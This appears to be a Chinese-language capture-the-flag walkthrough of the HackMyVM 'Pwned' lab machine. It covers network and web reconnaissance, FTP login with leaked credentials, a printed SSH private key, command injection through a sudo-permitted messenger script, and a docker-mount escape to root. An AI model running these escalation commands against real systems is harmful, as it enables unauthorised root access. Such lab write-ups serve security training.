---

目录

信息收集

arp

nmap

nikto

whatweb

WEB

web信息收集

dirsearch

wfuzz

FTP

ssh连接

提权

get user

系统信息收集

横向渗透

信息收集

arp

┌─[root@parrot]─[~/HackMyVM]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.112  08:00:27:e4:dc:38  PCS Systemtechnik GmbH

---

nmap

端口信息收集

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.112 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 10:55 GMT
Nmap scan report for 192.168.9.112
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E4:DC:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 38.77 second

服务信息收集

┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -O -p 21,22,80 192.168.9.112 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 10:57 GMT
Nmap scan report for 192.168.9.112
Host is up (0.00052s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:E4:DC:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds

---

nikto

┌─[roolting@parrot]─[~]
└──╼ $nikto -h http://192.168.9.112/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.112
+ Target Hostname:    192.168.9.112
+ Target Port:        80
+ Start Time:         2024-04-15 11:06:32 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nothing/: Directory indexing found.
+ /robots.txt: Entry '/nothing/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8103 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2024-04-15 11:06:59 (GMT0) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

---

whatweb

┌─[roolting@parrot]─[~]
└──╼ $whatweb -v http://192.168.9.112/
WhatWeb report for http://192.168.9.112/
Status    : 200 OK
Title     : Pwned....!!
IP        : 192.168.9.112
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]

Detected Plugins:
[ Apache ]
  The Apache HTTP Server Project is an effort to develop and 
  maintain an open-source HTTP server for modern operating 
  systems including UNIX and Windows NT. The goal of this 
  project is to provide a secure, efficient and extensible 
  server that provides HTTP services in sync with the current 
  HTTP standards. 

  Version      : 2.4.38 (from HTTP Server Header)
  Google Dorks: (3)
  Website     : http://httpd.apache.org/

[ HTML5 ]
  HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
  HTTP server header string. This plugin also attempts to 
  identify the operating system from the server header. 

  OS           : Debian Linux
  String       : Apache/2.4.38 (Debian) (from server string)

HTTP Headers:
  HTTP/1.1 200 OK
  Date: Mon, 15 Apr 2024 11:07:58 GMT
  Server: Apache/2.4.38 (Debian)
  Last-Modified: Mon, 06 Jul 2020 15:47:21 GMT
  ETag: "bf9-5a9c7ca4a3440-gzip"
  Accept-Ranges: bytes
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Content-Length: 692
  Connection: close
  Content-Type: text/html

---

可以先从80入手然后再去21最后22端口！

WEB

web信息收集

没啥有用的信息！我们检索一下目录！

---

dirsearch

┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.112/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x 403,404

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 207628

Output File: /root/HackMyVM/reports/http_192.168.9.112/__24-04-15_12-51-01.txt

Target: http://192.168.9.112/

[12:51:01] Starting: 
[12:51:23] 301 -  316B  - /nothing  ->  http://192.168.9.112/nothing/
[12:59:30] 301 -  320B  - /hidden_text  ->  http://192.168.9.112/hidden_text/

Task Completed

nothing没啥用！

这个看起来像目录，我们下载下来进行爆破！

---

┌─[root@parrot]─[~/HackMyVM]
└──╼ #wget http://192.168.9.112/hidden_text/secret.dic 1.txt
--2024-04-15 13:01:31--  http://192.168.9.112/hidden_text/secret.dic
正在连接 192.168.9.112:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：211
正在保存至: “secret.dic”

secret.dic                    100%[=================================================>]     211  --.-KB/s  用时 0s      

2024-04-15 13:01:31 (54.5 MB/s) - 已保存 “secret.dic” [211/211])

--2024-04-15 13:01:31--  http://1.txt/
正在解析主机 1.txt (1.txt)... 失败：未知的名称或服务。
wget: 无法解析主机地址 “1.txt”
下载完毕 --2024-04-15 13:01:33--
总用时：1.1s
下载了：1 个文件，0s (54.5 MB/s) 中的 211

wfuzz

┌─[root@parrot]─[~/HackMyVM]
└──╼ #wfuzz -w secret.dic -u http://192.168.9.112/FUZZ -t 100 --hc 403,404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.9.112/FUZZ
Total requests: 22

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                
=====================================================================

000000022:   200        75 L     191 W      3065 Ch     "http://192.168.9.112/"                                
000000017:   301        9 L      28 W       319 Ch      "/pwned.vuln"                                          

Total time: 0
Processed Requests: 22
Filtered Requests: 20
Requests/sec.: 0

---

发现账号密码：

ftpuser：B0ss_B!TcH

---

FTP

┌─[root@parrot]─[~/HackMyVM]
└──╼ #ftp 192.168.9.112
Connected to 192.168.9.112.
220 (vsFTPd 3.0.3)
Name (192.168.9.112:roolting): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||42404|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||47179|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 .
drwxrwxrwx    3 0        0            4096 Jul 09  2020 ..
-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa
-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt
226 Directory send OK.

在share目录下找到 id_rsa和note.txt文件！我们下载到本地！

ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||36811|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |***************************************************************************|  2602        5.02 KiB/s    00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (5.00 KiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||30095|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |***************************************************************************|    75       64.24 KiB/s    00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (39.35 KiB/s)

---

┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat id_rsa 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAthncqHSPVcE7xs136G/G7duiV6wULU+1Y906aF3ltGpht/sXByPB
aEzxOfqRXlQfkk7hpSYk8FCAibxddTGkd5YpcSH7U145sc2n7jwv0swjMu1ml+B5Vra7JJ
0cP/I27BcjMy7BxRpugZQJP214jiEixOK6gxTILZRAfHedblnd2rW6PhRcQK++jcEFM+ur
gaaktNdFyK4deT+YHghsYAUi/zyWcvqSOGy9iwO62w4TvMfYRaIL7hzhtvR6Ze6aBypqhV
m1C6YIIddYcJuXCV/DgiWXTIUQnhl38/Hxp0lzkhcN8muzOAmFMehktm3bX+y01jX+LziU
GDYM7cTQitZ0MhPDMwIoR0L89mjP4lVyX4A0kn/MxQaj4IxQnY7QG4D4C1bMIYJ0IA//k9
d4h0SNcEOlgDCZ0yCLZQeN3LSBe2IR4qFmdavyXJfb0Nzn5jhfVUchz9N9S8prP6+y3exZ
ADnomqLN1eMcsmu8z5v7w0q7Iv3vS2XMc/c7deZDAAAFiH5GUFF+RlBRAAAAB3NzaC1yc2
EAAAGBALYZ3Kh0j1XBO8bNd+hvxu3bolesFC1PtWPdOmhd5bRqYbf7FwcjwWhM8Tn6kV5U
H5JO4aUmJPBQgIm8XXUxpHeWKXEh+1NeObHNp+48L9LMIzLtZpfgeVa2uySdHD/yNuwXIz
MuwcUaboGUCT9teI4hIsTiuoMUyC2UQHx3nW5Z3dq1uj4UXECvvo3BBTPrq4GmpLTXRciu
HXk/mB4IbGAFIv88lnL6kjhsvYsDutsOE7zH2EWiC+4c4bb0emXumgcqaoVZtQumCCHXWH
Cblwlfw4Ill0yFEJ4Zd/Px8adJc5IXDfJrszgJhTHoZLZt21/stNY1/i84lBg2DO3E0IrW
dDITwzMCKEdC/PZoz+JVcl+ANJJ/zMUGo+CMUJ2O0BuA+AtWzCGCdCAP/5PXeIdEjXBDpY
AwmdMgi2UHjdy0gXtiEeKhZnWr8lyX29Dc5+Y4X1VHIc/TfUvKaz+vst3sWQA56JqizdXj
HLJrvM+b+8NKuyL970tlzHP3O3XmQwAAAAMBAAEAAAGACQ18FLvGrGKw0A9C2MFFyGlUxr
r9Pctqnw5OawXP94oaVYUb/fTfFopMq68zLtdLwoA9Y3Jj/7ZgzXgZxUu0e2VxpfgkgF58
y8QHhyZi0j3nug5nPUGhhpgK8aUF1H/8DvyPeWnnpB7OQ47Sbt7IUXiAO/1xfDa6RNnL4u
QnZWb+SnMiURe+BlE2TeG8mnoqyoU4Ru00wOc2++IXc9bDXHqk5L9kU071mex99701utIW
VRoyPDP0F+BDsE6zDwIvfJZxY2nVAZkdxZ+lit5XCSUuNr6zZWBBu9yAwVBaeuqGeZtiFN
W02Xd7eJt3dnFH+hdy5B9dD+jTmRsMkwjeE4vLLaSToVUVl8qWQy2vD6NdS3bdyTXWQWoU
1da3c1FYajXHvQlra6yUjALVLVK8ex4xNlrG86zFRfsc1h2CjqjRqrkt0zJr+Sl3bGk+v6
1DOp1QYfdD1r1IhFpxRlTt32DFcfzBs+tIfreoNSakDLSFBK/G0gQ7acfH4uM9XbBRAAAA
wQC1LMyX0BKA/X0EWZZWjDtbNoS72sTlruffheQ9AiaT+fmbbAwwh2bMOuT5OOZXEH4bQi
B7H5D6uAwhbVTtBLBrOc5xKOOKTcUabEpXJjif+WSK3T1Sd00hJUnNsesIM+GgdDhjXbfx
WY9c2ADpYcD/1g+J5RRHBFr3qdxMPi0zeDZE9052VnJ+WdYzK/5O3TT+8Bi7xVCAZUuQ1K
EcP3XLUrGVM6Usls4DEMJnd1blXAIcwQkAqGqwAHHuxgBIq64AAADBAN0/SEFZ9dGAn0tA
Qsi44wFrozyYmr5OcOd6JtK9UFVqYCgpzfxwDnC+5il1jXgocsf8iFEgBLIvmmtc7dDZKK
mCup9kY+fhR8wDaTgohGPWC6gO/obPD5DE7Omzrel56DaPwB7kdgxQH4aKy9rnjkgwlMa0
hPAK+PN4NfLCDZbnPbhXRSYD+91b4PFPgfSXR06nVCKQ7KR0/2mtD7UR07n/sg2YsMeCzv
m9kzzd64fbqGKEsRAUQJOCcgmKG2Zq3wAAAMEA0rRybJr61RaHlPJMTdjPanh/guzWhM/C
b0HDZLGU9lSEFMMAI+NPWlv9ydQcth6PJRr/w+0t4IVSKClLRBhbUJnB8kCjMKu56RVMkm
j6dQj+JUdPf4pvoUsfymhT98BhF9gUB2K+B/7srQ5NU2yNOV4e9uDmieH6jFY8hRo7RRCo
N71H6gMon74vcdSYpg3EbqocEeUN4ZOq23Bc5R64TLu2mnOrHvOlcMzUq9ydAAufgHSsbY
GxY4+eGHY4WJUdAAAADHJvb3RAQW5ubHlubgECAwQFBg==
-----END OPENSSH PRIVATE KEY-----

是个ssh私钥！我们直接连接！用户在note文件提示了！ ariana

---

ssh连接

---

提权

get user

---

系统信息收集

ariana@pwned:/home$ cat messenger.sh 
#!/bin/bash

clear
echo "Welcome to linux.messenger "
    echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
    echo ""
echo "$users"
    echo ""
read -p "Enter username to send message : " name 
    echo ""
read -p "Enter message for $name :" msg
    echo ""
echo "Sending message to $name "

$msg 2> /dev/null

    echo ""
echo "Message sent to $name :) "
    echo ""

这个文件很特殊！是以root权限运行！

ariana@pwned:/home$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

(selena) NOPASSWD: /home/messenger.sh

这个意思就是，ariana可以用身份来执行脚本！

sudo -u selena ./messenger.sh



Welcome to linux.messenger 


ariana:
selena:
ftpuser:

Enter username to send message : ariana 

Enter message for ariana :ls -al /home/selena

Sending message to ariana 
total 24
drwxrwx--- 3 selena root   4096 Jul 10  2020 .
drwxr-xr-x 5 root   root   4096 Jul 10  2020 ..
-rw------- 1 selena selena    1 Jul 10  2020 .bash_history
drwxr-xr-x 3 selena selena 4096 Jul  9  2020 .local
-rw-r--r-- 1 selena selena  132 Jul 10  2020 selena-personal.diary
-rw-r--r-- 1 selena selena  100 Jul 10  2020 user2.txt

Message sent to ariana :) 

可以看到，确实不需要密码！

---

横向渗透

payload

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

docker run -v /:/mnt --rm -it alpine chroot /mnt sh                                                
# id
# uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
#  

ok!在root目录下得到最后一个flag！